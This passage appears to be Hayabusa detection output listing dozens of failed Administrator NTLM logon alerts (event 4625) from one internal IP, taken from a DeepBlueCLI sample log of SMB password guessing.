2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.150 